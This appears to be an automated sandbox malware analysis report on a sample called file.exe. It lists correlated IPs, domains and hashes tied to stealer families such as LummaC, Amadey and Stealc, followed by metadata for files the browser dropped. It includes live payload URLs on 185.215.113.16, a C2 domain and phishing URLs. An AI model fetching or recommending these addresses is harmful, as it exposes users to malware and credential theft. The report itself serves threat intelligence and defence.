                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • VT rate limit hit for: file.exe
                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        11:41:22API Interceptor40x Sleep call for process: file.exe modified
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        13.107.246.63https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                797F2AEA-982C-4B8E-84F4-E90FD6A89D27.1_originalmail.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  prepper-wu.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      http://finaltestwebsite.duckdns.org/UpdateVerifyPrss!/RBC/?key=5050d2156464f8b75b40f3d8cba168a3d4aa145eGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        https://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          https://url.uk.m.mimecastprotect.com/s/KmJpCzK8Xiv1VmXPt4fKtv1nCx?domain=nasunifiles.s3.amazonaws.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            239.255.255.250https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              http://robnzuwubz.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                https://vendor.ziphq.com/magic-link/b47e3e5c-c77a-4377-b922-4ceee97070f7Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  https://amstoree.z13.web.core.windows.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    http://grastoonm3vides.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      http://robnzuwubz.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            https://pib.login-uk.mimecast.com/u/login/?gta=secure&tkn=3.NC0QDc8Wcx0dHYIyK87aHx-6EOCiyG0Ksn5KcwbjKTBX0aWXz_pzSxGNasCXm0IvpIy6CFFQvQyXFXm7InF3zIueswFC_GPgsliIBZrOHFx--kjuP6hbmebwSKGhqZpX.EzM5YqGuvKf-M-m1D6Kp1Q#/change-password/IVoqqJ6PETXLx5ML9Tojj40C5CNhzMmc56xAK6aopPIIVkr_FpvggkqGZT9jZhzNRNzZnBC0FBFYpZ_ZeaW9u3xoKEnXd74qgZ09wVf-ih5sQlp_JK2KbVZ2bIzCnJ_PgBKMn4FKWik_kEEHerQwBEmxCta_xDAcNwP3U9L5w0JXE41fUT_xtnIsBQVbgUGpgC9dQuMmbk7bgBNC-Y0P9KydDFdsQU-AyTVGS1gscgcKiFrw7--s1-72XJ9F0NowHMkBZk_APYXQbA3MY_sV7AGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                185.215.113.16file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/random.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                104.21.66.38file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                  EXTERNAL Past Due Reminder March 15 2023.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    12218d47_by_Libranalysis.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      cook-rain.sbsfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.155.248
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.155.248
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.155.248
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      s-part-0035.t-0009.t-msedge.nethttps://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      grass.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      https://vendor.ziphq.com/magic-link/b47e3e5c-c77a-4377-b922-4ceee97070f7Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      797F2AEA-982C-4B8E-84F4-E90FD6A89D27.1_originalmail.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      prepper-wu.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      https://1.midlifemouse.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVFXRTNlSFU9JnVpZD1VU0VSMTIxMTIwMjRVNTUxMTEyMjQ=N0123Nexample@email.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      CLOUDFLARENETUShttps://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.16.123.96
                                                                                                                                                                                                                      LxvS6uMf0g.exeGet hashmaliciousAcrid StealerBrowse
                                                                                                                                                                                                                      • 104.21.68.220
                                                                                                                                                                                                                      https://vendor.ziphq.com/magic-link/b47e3e5c-c77a-4377-b922-4ceee97070f7Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.66.43.192
                                                                                                                                                                                                                      http://grastoonm3vides.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.57.169
                                                                                                                                                                                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 172.67.220.36
                                                                                                                                                                                                                      NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 104.21.40.167
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                      PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.187.200
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.155.248
                                                                                                                                                                                                                      ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 172.66.47.118
                                                                                                                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUShttps://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 150.171.27.10
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 20.44.10.122
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 13.107.246.62
                                                                                                                                                                                                                      797F2AEA-982C-4B8E-84F4-E90FD6A89D27.1_originalmail.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      797F2AEA-982C-4B8E-84F4-E90FD6A89D27.1_originalmail.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 52.109.28.47
                                                                                                                                                                                                                      prepper-wu.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 13.107.246.62
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 13.107.246.62
                                                                                                                                                                                                                      https://shadowline-hub-uk-limited.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 20.76.201.171
                                                                                                                                                                                                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                      • 185.215.113.43
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.215.113.16
                                                                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.215.113.16
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.215.113.16
                                                                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      28a2c9bd18a11de089ef85a160da29e4https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      http://robnzuwubz.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      https://vendor.ziphq.com/magic-link/b47e3e5c-c77a-4377-b922-4ceee97070f7Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      https://amstoree.z13.web.core.windows.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      http://grastoonm3vides.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      http://robnzuwubz.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      https://pib.login-uk.mimecast.com/u/login/?gta=secure&tkn=3.NC0QDc8Wcx0dHYIyK87aHx-6EOCiyG0Ksn5KcwbjKTBX0aWXz_pzSxGNasCXm0IvpIy6CFFQvQyXFXm7InF3zIueswFC_GPgsliIBZrOHFx--kjuP6hbmebwSKGhqZpX.EzM5YqGuvKf-M-m1D6Kp1Q#/change-password/IVoqqJ6PETXLx5ML9Tojj40C5CNhzMmc56xAK6aopPIIVkr_FpvggkqGZT9jZhzNRNzZnBC0FBFYpZ_ZeaW9u3xoKEnXd74qgZ09wVf-ih5sQlp_JK2KbVZ2bIzCnJ_PgBKMn4FKWik_kEEHerQwBEmxCta_xDAcNwP3U9L5w0JXE41fUT_xtnIsBQVbgUGpgC9dQuMmbk7bgBNC-Y0P9KydDFdsQU-AyTVGS1gscgcKiFrw7--s1-72XJ9F0NowHMkBZk_APYXQbA3MY_sV7AGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                      • 20.12.23.50
                                                                                                                                                                                                                      • 2.18.84.141
                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1LxvS6uMf0g.exeGet hashmaliciousAcrid StealerBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      jokLq9gHyc.exeGet hashmaliciousINC RansomwareBrowse
                                                                                                                                                                                                                      • 104.21.66.38
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):5644
                                                                                                                                                                                                                      Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                      MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                      SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                      SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                      SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                                      Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):35005
                                                                                                                                                                                                                      Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                      MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                      SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                      SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                      SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                                      Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):4897
                                                                                                                                                                                                                      Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                                      MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                                      SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                                      SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                                      SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                                      Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                      Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                      MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                      SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                      SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                      SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1173007
                                                                                                                                                                                                                      Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                      MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                      SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                      SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                      SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):33370
                                                                                                                                                                                                                      Entropy (8bit):7.973675198531228
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                                      MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                                      SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                                      SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
